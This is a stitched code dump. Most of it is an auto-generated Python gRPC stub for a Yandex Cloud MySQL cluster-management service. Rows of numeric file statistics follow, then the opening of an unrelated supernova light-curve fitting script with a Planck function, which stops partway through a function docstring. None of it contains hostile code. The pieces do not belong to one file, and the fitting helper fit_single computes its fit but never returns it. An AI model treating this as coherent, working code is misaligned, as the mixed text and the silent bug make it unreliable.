response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Start = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Start',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Stop = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Stop',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Move = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Move',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Backup = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Backup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Restore = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/Restore',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.RescheduleMaintenance = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/RescheduleMaintenance',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.StartFailover = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/StartFailover',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListLogs = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/ListLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
)
self.StreamLogs = channel.unary_stream(
'/yandex.cloud.mdb.mysql.v1.ClusterService/StreamLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/ListOperations',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
)
self.ListBackups = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/ListBackups',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
)
self.ListHosts = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/ListHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
)
self.AddHosts = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/AddHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateHosts = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/UpdateHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteHosts = channel.unary_unary(
'/yandex.cloud.mdb.mysql.v1.ClusterService/DeleteHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
class ClusterServiceServicer(object):
"""A set of methods for managing MySQL clusters.
"""
def Get(self, request, context):
"""Returns the specified MySQL cluster.
To get the list of available MySQL clusters, make a [List] request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Retrieves the list of MySQL clusters that belong to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates a MySQL cluster in the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Modifies the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Starts the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stops the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Move(self, request, context):
"""Moves the specified MySQL cluster to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Backup(self, request, context):
"""Creates a backup for the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Restore(self, request, context):
"""Creates a new MySQL cluster using the specified backup.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RescheduleMaintenance(self, request, context):
"""Reschedules planned maintenance operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StartFailover(self, request, context):
"""Start a manual failover on the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListLogs(self, request, context):
"""Retrieves logs for the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StreamLogs(self, request, context):
"""Same as ListLogs but using server-side streaming. Also allows for 'tail -f' semantics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Retrieves the list of operations for the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListBackups(self, request, context):
"""Retrieves the list of available backups for the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListHosts(self, request, context):
"""Retrieves a list of hosts for the specified MySQL cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddHosts(self, request, context):
"""Creates new hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateHosts(self, request, context):
"""Updates the specified hosts.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteHosts(self, request, context):
"""Deletes the specified hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ClusterServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Move': grpc.unary_unary_rpc_method_handler(
servicer.Move,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Backup': grpc.unary_unary_rpc_method_handler(
servicer.Backup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Restore': grpc.unary_unary_rpc_method_handler(
servicer.Restore,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'RescheduleMaintenance': grpc.unary_unary_rpc_method_handler(
servicer.RescheduleMaintenance,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'StartFailover': grpc.unary_unary_rpc_method_handler(
servicer.StartFailover,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListLogs': grpc.unary_unary_rpc_method_handler(
servicer.ListLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.SerializeToString,
),
'StreamLogs': grpc.unary_stream_rpc_method_handler(
servicer.StreamLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.SerializeToString,
),
'ListBackups': grpc.unary_unary_rpc_method_handler(
servicer.ListBackups,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.SerializeToString,
),
'ListHosts': grpc.unary_unary_rpc_method_handler(
servicer.ListHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.SerializeToString,
),
'AddHosts': grpc.unary_unary_rpc_method_handler(
servicer.AddHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateHosts': grpc.unary_unary_rpc_method_handler(
servicer.UpdateHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteHosts': grpc.unary_unary_rpc_method_handler(
servicer.DeleteHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.mdb.mysql.v1.ClusterService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ClusterService(object):
"""A set of methods for managing MySQL clusters.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Get',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__pb2.Cluster.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/List',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Create',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Update',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Delete',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Start',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Stop',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Move(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Move',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Backup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Backup',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Restore(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Restore',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RescheduleMaintenance(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/RescheduleMaintenance',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StartFailover(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/StartFailover',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListLogs',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StreamLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/StreamLogs',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListOperations',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListBackups(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListBackups',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListHosts',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/AddHosts',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/UpdateHosts',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/DeleteHosts',
yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 53.042996
| 156
| 0.701836
| 3,955
| 38,244
| 6.306953
| 0.044753
| 0.044379
| 0.069035
| 0.083828
| 0.913606
| 0.908475
| 0.904386
| 0.856318
| 0.849703
| 0.808371
| 0
| 0.008588
| 0.232742
| 38,244
| 720
| 157
| 53.116667
| 0.841495
| 0.042647
| 0
| 0.584691
| 1
| 0
| 0.086187
| 0.056937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068404
| false
| 0
| 0.006515
| 0.032573
| 0.112378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dd64babbb4c18695440845f5e49cf6aff62541e
| 18,819
|
py
|
Python
|
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
def single_powerlaw(t, t0, a, mg0):
"""
t :
t0 :
a :
mg0 :
"""
import numpy as np
mg = mg0 + 2.5*a*np.log10(t - t0)
return mg
def fit_single(t, mg, mge, initial, maxfev):
"""
t : time relative to specific date.
mg : magnitude
mge : magnitude error
initial : list of initial values of t0, a, mg0, enter like [1.5, 2., 16.5]
"""
from scipy.optimize import curve_fit
popt, pcov = curve_fit(single_powerlaw, t, mg, sigma=mge, p0=initial, absolute_sigma=True, maxfev=maxfev, check_finite=True)
def planck(wave, temp):
import numpy as np
#if len(wave) > 1 :
# print('Syntax - bbflux = planck( wave, temp)')
# return 0
#if len(temp) != 1 :
# input('Enter a blackbody temperature : ')
# Gives the blackbody flux (i.e. PI*Intensity) ergs/cm2/s/a
w = wave/1.e8 # angstroms to cm
# constants appropriate to cgs units.
c1 = np.float128(3.7417749e-5) # =2*!DPI*h*c*c
c2 = np.float128(1.4387687) # =h*c/k
val = c2/w/np.float128(temp)
bbflux = c1/( (w**5)*(np.exp(val)-1.))
return bbflux*1.e-8 # convert to ergs cm-2 s-1 A-1
def fearly2_rw10(td, rstar, band) :
"""
This function produces the shock-heated emssion light curve.
